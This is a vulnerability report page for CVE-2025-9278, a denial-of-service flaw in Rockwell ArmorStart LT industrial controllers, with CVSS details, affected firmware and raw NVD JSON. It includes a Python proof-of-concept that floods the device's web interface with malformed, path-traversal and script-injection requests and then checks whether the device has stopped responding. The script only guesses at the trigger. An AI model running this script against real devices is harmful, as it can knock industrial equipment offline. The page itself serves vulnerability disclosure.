Security Vulnerability Report
CVE-2025-9278 CVSS 7.5 HIGH

CVE-2025-9278

Published: 2026-01-20 14:16:09
Last Modified: 2026-02-02 18:09:05

Description

A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation ArmorStart LT (refer to the official advisory for specific version information)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-9278 PoC - ArmorStart LT Denial of Service
This PoC demonstrates the DoS vulnerability in ArmorStart LT devices.
The device becomes unresponsive after active scanning.
"""
import subprocess
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse

import requests


def send_malformed_request(target_url):
    """Send various malformed HTTP requests to trigger the vulnerability"""
    headers_list = [
        {'User-Agent': 'Mozilla/5.0 (compatible; BurpScanner/2.0)'},
        {'X-Forwarded-For': '127.0.0.1'},
        {'Referer': 'http://test.com'},
    ]
    # Malformed requests that may trigger the DoS
    payloads = [
        '',  # Empty payload
        'A' * 10000,  # Long string
        '../../../etc/passwd',
        '<script>alert(1)</script>',
    ]
    for header in headers_list:
        for payload in payloads:
            try:
                requests.get(target_url, headers=header,
                             params={'q': payload}, timeout=5)
            except requests.exceptions.RequestException:
                pass


def check_device_responsive(target_url):
    """Check if the device is still responsive"""
    try:
        requests.get(target_url, timeout=5)
        return True
    except requests.exceptions.RequestException:
        return False


def check_icmp_connectivity(target_ip):
    """Check ICMP connectivity using system ping command"""
    try:
        result = subprocess.run(['ping', '-c', '1', '-W', '2', target_ip],
                                capture_output=True, timeout=3)
        return result.returncode == 0
    except (subprocess.SubprocessError, OSError):
        return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-9278-poc.py <target_url>")
        print("Example: python cve-2025-9278-poc.py http://192.168.1.100")
        sys.exit(1)

    target_url = sys.argv[1]
    # Take the host from the parsed URL so a path or port does not end up in the ping target
    target_ip = urlparse(target_url).hostname
    if not target_ip:
        print("[-] Could not parse a host from the target URL")
        sys.exit(1)

    print(f"[*] Starting CVE-2025-9278 DoS test against {target_url}")
    print("[*] Checking initial device status...")

    # Check initial status
    if not check_device_responsive(target_url):
        print("[-] Device is not responding before testing")
        return
    if not check_icmp_connectivity(target_ip):
        print("[-] Device does not respond to ICMP before testing")
    else:
        print("[+] Device responds to ICMP ping")

    print("[*] Sending malformed requests (simulating Burp Suite active scan)...")

    # Send multiple requests to trigger DoS
    with ThreadPoolExecutor(max_workers=10) as executor:
        for i in range(100):
            executor.submit(send_malformed_request, target_url)
            if i % 10 == 0:
                print(f"[*] Progress: {i}/100 requests sent")

    print("[*] Waiting for device to process requests...")
    time.sleep(10)

    print("[*] Checking device status after testing...")

    # Check post-attack status
    if not check_device_responsive(target_url):
        print("[+] VULNERABLE: Web interface is not accessible (DoS confirmed)")
    else:
        print("[-] Web interface is still accessible")
    if not check_icmp_connectivity(target_ip):
        print("[+] VULNERABLE: Device lost ICMP connectivity (DoS confirmed)")
    else:
        print("[-] Device still responds to ICMP")

    print("[*] Testing complete. Note: Device may require manual reboot to recover.")


if __name__ == '__main__':
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9278", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:08.680", "lastModified": "2026-02-02T18:09:05.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible."}, {"lang": "es", "value": "Existe un problema de seguridad en ArmorStart® LT que puede resultar en una condición de denegación de servicio. Después de ejecutar un escaneo activo de Burp Suite, el dispositivo pierde conectividad ICMP, causando que la aplicación web se vuelva inaccesible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.002", "matchCriteriaId": "564CE3DE-2D80-4511-B970-C644C7217F20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AB2017-CB37-4A93-90FD-7FE82640FB77"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}